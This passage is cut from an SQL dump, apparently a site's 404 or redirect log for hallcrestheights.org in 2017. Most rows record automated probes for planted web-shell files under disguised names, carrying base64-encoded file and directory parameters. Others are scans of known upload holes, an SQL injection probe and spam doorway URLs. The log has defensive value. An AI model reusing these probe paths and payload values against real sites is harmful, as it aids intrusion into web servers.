00:00:00'),(6712,'http://hallcrestheights.org//webconfig.txt.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:28','0000-00-00 00:00:00'),(6713,'http://hallcrestheights.org//cache/cachee.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:32','0000-00-00 00:00:00'),(6714,'http://hallcrestheights.org//thumb.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:34','0000-00-00 00:00:00'),(6715,'http://hallcrestheights.org//SessionController.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:07:37','0000-00-00 00:00:00'),(6716,'http://hallcrestheights.org//maill.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-02-24 15:07:39','0000-00-00 00:00:00'),(6717,'http://hallcrestheights.org//error-log.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:00','0000-00-00 00:00:00'),(6718,'http://hallcrestheights.org//authenticating.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:03','0000-00-00 00:00:00'),(6719,'http://hallcrestheights.org//google-assist.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:05','0000-00-00 00:00:00'),(6720,'http://hallcrestheights.org//images/google-assist.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:10','0000-00-00 00:00:00'),(6721,'http://hallcrestheights.org//images/robots.txt.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:12','0000-00-00 00:00:00'),(6722,'http://hallcrestheights.org//elements.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:16','0000-00-00 00:00:00'),(6723,'http://hallcrestheights.org//xmlsrpc.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:18','0000-00-00 00:00:00'),(6724,'http://hallcrestheights.org//wp-cache.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:21','0000-00-00 00:00:00'),(6725,'http://hallcrestheights.org//images/404.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:23','0000-00-00 00:00:00'),(6726,'http://hallcrestheights.org//images/head.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:25','0000-00-00 00:00:00'),(6727,'http://hallcrestheights.org//cache/support.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:28','0000-00-00 00:00:00'),(6728,'http://hallcrestheights.org//RoseLeif.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:30','0000-00-00 00:00:00'),(6729,'http://hallcrestheights.org//Abbrevsprl.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:32','0000-00-00 00:00:00'),(6730,'http://hallcrestheights.org//show.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:34','0000-00-00 00:00:00'),(6731,'http://hallcrestheights.org//images/defau1t.php?z3=RmdQVzNuLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:36','0000-00-00 00:00:00'),(6732,'http://hallcrestheights.org//cli/40dd1d.php?z3=RmdQVzNuLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:38','0000-00-00 00:00:00'),(6733,'http://hallcrestheights.org//infos.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:41','0000-00-00 00:00:00'),(6734,'http://hallcrestheights.org//cache/defau1t.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:43','0000-00-00 00:00:00'),(6735,'http://hallcrestheights.org//bookmark.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:45','0000-00-00 00:00:00'),(6736,'http://hallcrestheights.org//configbak.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:48','0000-00-00 00:00:00'),(6737,'http://hallcrestheights.org//wp-data.php?z3=RmdQVzNuLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:51','0000-00-00 00:00:00'),(6738,'http://hallcrestheights.org//wp-content/plugins/Fbrrchive.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:53','0000-00-00 00:00:00'),(6739,'http://hallcrestheights.org//wp-content/uploads/Fbrrchive.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:55','0000-00-00 00:00:00'),(6740,'http://hallcrestheights.org//wp-content/plugins/myshe.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:57','0000-00-00 00:00:00'),(6741,'http://hallcrestheights.org//wp-content/plugins/wp-cache.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:08:59','0000-00-00 00:00:00'),(6742,'http://hallcrestheights.org//wp-content/plugins/wp-footers.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:01','0000-00-00 00:00:00'),(6743,'http://hallcrestheights.org//wp-content/plugins/wpfootes.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:04','0000-00-00 00:00:00'),(6744,'http://hallcrestheights.org//wp-content/plugins/sql_dump.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:06','0000-00-00 00:00:00'),(6745,'http://hallcrestheights.org//wp-content/plugins/SocketIontrol.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:08','0000-00-00 00:00:00'),(6746,'http://hallcrestheights.org//wp-content/plugins/SocketIasrgasfontrol.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:11','0000-00-00 00:00:00'),(6747,'http://hallcrestheights.org//wp-content/plugins/Analyser.php?z3=RmdQVzNuLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:14','0000-00-00 00:00:00'),(6748,'http://hallcrestheights.org//cache/list.php?z3=RmdQVzNuLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-02-24 15:09:16','0000-00-00 00:00:00'),(6749,'http://hallcrestheights.org//modules/mod_simplefileuploadv1.3/elements/FgPW3n.php',NULL,'','',1,0,'2017-02-24 15:10:07','0000-00-00 00:00:00'),(6750,'http://hallcrestheights.org//wp-content/plugins/revslider/temp/update_extract/FgPW3n.php',NULL,'','',1,0,'2017-02-24 15:10:09','0000-00-00 00:00:00'),(6751,'http://hallcrestheights.org//wp-content/uploads/FgPW3n.php',NULL,'','',1,0,'2017-02-24 15:10:12','0000-00-00 00:00:00'),(6752,'http://hallcrestheights.org//FgPW3n.php',NULL,'','',1,0,'2017-02-24 15:10:13','0000-00-00 00:00:00'),(6753,'http://hallcrestheights.org//sites/all/libraries/elfinder/files/FgPW3n.php',NULL,'','',1,0,'2017-02-24 15:10:15','0000-00-00 00:00:00'),(6754,'http://hallcrestheights.org/k25416-vqjnys-pvholj-peurrt-pilu-i20162628-ourxiv-lbtrhn-nmtqz-kowtsxp.htm',NULL,'','',5,0,'2017-02-24 18:02:59','0000-00-00 00:00:00'),(6755,'http://hallcrestheights.org/zmkue-i20162629-k34174-dtzj-ivyo-qxifgxuh/xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-02-25 07:49:16','0000-00-00 00:00:00'),(6756,'http://hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-k34524-vuclzuph-i20162629-vqawuo-xzmnp-zvsgcr.htm',NULL,'','',1,0,'2017-02-25 14:47:37','0000-00-00 00:00:00'),(6757,'http://hallcrestheights.org/edzvd-i20162629-k33724-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',1,0,'2017-02-25 21:43:42','0000-00-00 00:00:00'),(6758,'http://hallcrestheights.org/i20162628-upttmn-beatgr/k46466-bnqcdc-ncxr.htm',NULL,'','',1,0,'2017-02-26 00:47:57','0000-00-00 00:00:00'),(6759,'http://www.hallcrestheights.org/soegszx-k34973-yifet-i20162630-vtndyu-uhvfcy/',NULL,'https://www.google.co.jp/','',8,0,'2017-02-26 14:31:43','0000-00-00 00:00:00'),(6760,'http://hallcrestheights.org/k33924-lugdl-trsm-xxhy-i20162629-pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn-yfeebsb.htm',NULL,'','',1,0,'2017-02-26 16:48:36','0000-00-00 00:00:00'),(6761,'http://hallcrestheights.org/index.php?option=com_booklibrary&task=suggestion&comment=1\'',NULL,'','',1,0,'2017-02-26 23:39:07','0000-00-00 00:00:00'),(6762,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-i20162632-dykb-qxdos-k49489-fiet/',NULL,'','',2,0,'2017-02-27 04:54:36','0000-00-00 00:00:00'),(6763,'http://hallcrestheights.org/dvisc-i20162629-iwbv/k54674-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-02-27 13:44:22','0000-00-00 00:00:00'),(6764,'http://www.hallcrestheights.org/i20162632-k32084-fadla-jfnl-gfpc-vwgmyhde.htm',NULL,'','',6,0,'2017-02-28 08:52:45','0000-00-00 00:00:00'),(6765,'http://hallcrestheights.org/jglet-i20162629-kymd/k55574-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-03-01 00:25:53','0000-00-00 00:00:00'),(6766,'http://www.hallcrestheights.org/bsoa-i20162629-k39005-pazapst-asgmhcq-cmckf/',NULL,'','',8,0,'2017-03-01 17:29:52','0000-00-00 00:00:00'),(6767,'http://hallcrestheights.org/edzvd-lqco-mnnm-i20162629-mcawvbfu/japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp-k34374-udzikmu.htm',NULL,'','',1,0,'2017-03-01 19:55:12','0000-00-00 00:00:00'),(6768,'http://www.hallcrestheights.org/xhajvql-wczbi-i20162630-qsosqx-oqkgqa-qydcp-k46373-tznz/',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwjXo9HckrfSAhUph1QKHZUhD7IQFggyMAQ&url=http%3A%2F%2Fwww.hallcrestheights.or','',3,0,'2017-03-02 06:05:43','0000-00-00 00:00:00'),(6769,'http://hallcrestheights.org/libraries/joomla/index_old.php',NULL,'','',1,0,'2017-03-02 14:32:31','0000-00-00 00:00:00'),(6770,'http://hallcrestheights.org/wp-logs.php?action=test',NULL,'','',1,0,'2017-03-02 14:32:31','0000-00-00 00:00:00'),(6771,'http://hallcrestheights.org/11.php?n',NULL,'','',1,0,'2017-03-02 15:16:00','0000-00-00 00:00:00'),(6772,'http://www.hallcrestheights.org/ajqxxuc-k45773-uzaof-i20162630-ifephi-ijimjn/',NULL,'http://search.yahoo.co.jp/','',1,0,'2017-03-03 02:07:10','0000-00-00 00:00:00'),(6773,'http://hallcrestheights.org/images/xxu.php',NULL,'','',43,0,'2017-03-03 02:18:29','0000-00-00 00:00:00'),(6774,'http://hallcrestheights.org/x.php',NULL,'','',47,0,'2017-03-03 02:18:33','0000-00-00 00:00:00'),(6775,'http://hallcrestheights.org/sql-bak.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:20:19','0000-00-00 00:00:00'),(6776,'http://hallcrestheights.org/email.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:20:25','0000-00-00 00:00:00'),(6777,'http://hallcrestheights.org/functions.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:20:36','0000-00-00 00:00:00'),(6778,'http://hallcrestheights.org/cache/news.php?z3=RjJYdGxGLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:20:47','0000-00-00 00:00:00'),(6779,'http://hallcrestheights.org/tmp.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 02:21:24','0000-00-00 00:00:00'),(6780,'http://hallcrestheights.org/shootme.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:21:27','0000-00-00 00:00:00'),(6781,'http://hallcrestheights.org/configurationbak.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:21:31','0000-00-00 00:00:00'),(6782,'http://hallcrestheights.org/robots.txt.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:21:35','0000-00-00 00:00:00'),(6783,'http://hallcrestheights.org/jconfig.php?z3=RjJYdGxGLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 02:21:40','0000-00-00 00:00:00'),(6784,'http://hallcrestheights.org/media/reads.php?z3=RjJYdGxGLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 02:23:20','0000-00-00 00:00:00'),(6785,'http://hallcrestheights.org/sqlbak.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:07:16','0000-00-00 00:00:00'),(6786,'http://hallcrestheights.org/sql-bak.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:07:38','0000-00-00 00:00:00'),(6787,'http://hallcrestheights.org/email.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:08:38','0000-00-00 00:00:00'),(6788,'http://hallcrestheights.org/functions.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:09:02','0000-00-00 00:00:00'),(6789,'http://hallcrestheights.org/cache/news.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:10:09','0000-00-00 00:00:00'),(6790,'http://hallcrestheights.org/tmp.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-03-03 03:10:38','0000-00-00 00:00:00'),(6791,'http://hallcrestheights.org/shootme.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',6,0,'2017-03-03 03:11:41','0000-00-00 00:00:00'),(6792,'http://hallcrestheights.org/configurationbak.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:12:59','0000-00-00 00:00:00'),(6793,'http://hallcrestheights.org/robots.txt.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:13:23','0000-00-00 00:00:00'),(6794,'http://hallcrestheights.org/jconfig.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:13:53','0000-00-00 00:00:00'),(6795,'http://hallcrestheights.org/media/reads.php?z3=UWppVGpMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:14:17','0000-00-00 00:00:00'),(6796,'http://hallcrestheights.org/media/1ndex.php?z3=UWppVGpMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:14:47','0000-00-00 00:00:00'),(6797,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=UWppVGpMLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:15:16','0000-00-00 00:00:00'),(6798,'http://hallcrestheights.org/sql_dump.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:15:45','0000-00-00 00:00:00'),(6799,'http://hallcrestheights.org/error-logs.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:17:38','0000-00-00 00:00:00'),(6800,'http://hallcrestheights.org/media/404.php?z3=UWppVGpMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:17:55','0000-00-00 00:00:00'),(6801,'http://hallcrestheights.org/media/tmp.php?z3=UWppVGpMLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:18:29','0000-00-00 00:00:00'),(6802,'http://hallcrestheights.org/r3x.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:19:03','0000-00-00 00:00:00'),(6803,'http://hallcrestheights.org/log.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:19:36','0000-00-00 00:00:00'),(6804,'http://hallcrestheights.org/images/stories/0day.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:21:16','0000-00-00 00:00:00'),(6805,'http://hallcrestheights.org/includes/u2p.php?z3=UWppVGpMLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:21:48','0000-00-00 00:00:00'),(6806,'http://hallcrestheights.org/images/xxx.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:22:24','0000-00-00 00:00:00'),(6807,'http://hallcrestheights.org/al277.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:22:54','0000-00-00 00:00:00'),(6808,'http://hallcrestheights.org/roubt.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:23:26','0000-00-00 00:00:00'),(6809,'http://hallcrestheights.org/includes.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:24:01','0000-00-00 00:00:00'),(6810,'http://hallcrestheights.org/images/al277.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:24:37','0000-00-00 00:00:00'),(6811,'http://hallcrestheights.org/webconfig.txt.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:25:10','0000-00-00 00:00:00'),(6812,'http://hallcrestheights.org/cache/cachee.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:29:12','0000-00-00 00:00:00'),(6813,'http://hallcrestheights.org/thumb.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:29:57','0000-00-00 00:00:00'),(6814,'http://hallcrestheights.org/configbak.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:31:21','0000-00-00 00:00:00'),(6815,'http://hallcrestheights.org/wp-main.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:32:00','0000-00-00 00:00:00'),(6816,'http://hallcrestheights.org/robot.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:32:40','0000-00-00 00:00:00'),(6817,'http://hallcrestheights.org/install.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:33:17','0000-00-00 00:00:00'),(6818,'http://hallcrestheights.org/images/1ndex.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:33:47','0000-00-00 00:00:00'),(6819,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=UWppVGpMLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:34:21','0000-00-00 00:00:00'),(6820,'http://hallcrestheights.org/resd.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:34:54','0000-00-00 00:00:00'),(6821,'http://hallcrestheights.org/injctory.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:37:09','0000-00-00 00:00:00'),(6822,'http://hallcrestheights.org/mmytc.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:37:23','0000-00-00 00:00:00'),(6823,'http://hallcrestheights.org/M-F4r3s.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:38:01','0000-00-00 00:00:00'),(6824,'http://hallcrestheights.org/images/laj.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:38:38','0000-00-00 00:00:00'),(6825,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:39:25','0000-00-00 00:00:00'),(6826,'http://hallcrestheights.org/wsdl.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:39:53','0000-00-00 00:00:00'),(6827,'http://hallcrestheights.org/goog1es.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:40:28','0000-00-00 00:00:00'),(6828,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=UWppVGpMLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:41:02','0000-00-00 00:00:00'),(6829,'http://hallcrestheights.org/update.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:41:45','0000-00-00 00:00:00'),(6830,'http://hallcrestheights.org/news.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:42:37','0000-00-00 00:00:00'),(6831,'http://hallcrestheights.org/SessionController.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:43:11','0000-00-00 00:00:00'),(6832,'http://hallcrestheights.org/maill.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:43:56','0000-00-00 00:00:00'),(6833,'http://hallcrestheights.org/error-log.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:45:28','0000-00-00 00:00:00'),(6834,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:46:16','0000-00-00 00:00:00'),(6835,'http://hallcrestheights.org/authenticating.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:47:02','0000-00-00 00:00:00'),(6836,'http://hallcrestheights.org/google-assist.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:47:46','0000-00-00 00:00:00'),(6837,'http://hallcrestheights.org/images/google-assist.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:48:32','0000-00-00 00:00:00'),(6838,'http://hallcrestheights.org/images/robots.txt.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:48:53','0000-00-00 00:00:00'),(6839,'http://hallcrestheights.org/elements.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:49:24','0000-00-00 00:00:00'),(6840,'http://hallcrestheights.org/xmlsrpc.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:50:01','0000-00-00 00:00:00'),(6841,'http://hallcrestheights.org/wp-cache.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:50:36','0000-00-00 00:00:00'),(6842,'http://hallcrestheights.org/images/404.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:51:18','0000-00-00 00:00:00'),(6843,'http://hallcrestheights.org/images/head.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:53:02','0000-00-00 00:00:00'),(6844,'http://hallcrestheights.org/cache/support.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:53:26','0000-00-00 00:00:00'),(6845,'http://hallcrestheights.org/RoseLeif.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:54:08','0000-00-00 00:00:00'),(6846,'http://hallcrestheights.org/Abbrevsprl.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:54:51','0000-00-00 00:00:00'),(6847,'http://hallcrestheights.org/show.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:55:29','0000-00-00 00:00:00'),(6848,'http://hallcrestheights.org/images/defau1t.php?z3=UWppVGpMLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:56:32','0000-00-00 00:00:00'),(6849,'http://hallcrestheights.org/cli/40dd1d.php?z3=UWppVGpMLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 03:58:11','0000-00-00 00:00:00'),(6850,'http://hallcrestheights.org/bk.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 03:59:33','0000-00-00 00:00:00'),(6851,'http://hallcrestheights.org/infos.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:01:29','0000-00-00 00:00:00'),(6852,'http://hallcrestheights.org/cache/defau1t.php?z3=UWppVGpMLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:03:38','0000-00-00 00:00:00'),(6853,'http://hallcrestheights.org/A.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:03:52','0000-00-00 00:00:00'),(6854,'http://hallcrestheights.org/bookmark.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:04:24','0000-00-00 00:00:00'),(6855,'http://hallcrestheights.org/wp-data.php?z3=UWppVGpMLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:07:23','0000-00-00 00:00:00'),(6856,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-03 04:07:41','0000-00-00 00:00:00'),(6857,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=UWppVGpMLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-03 04:09:33','0000-00-00 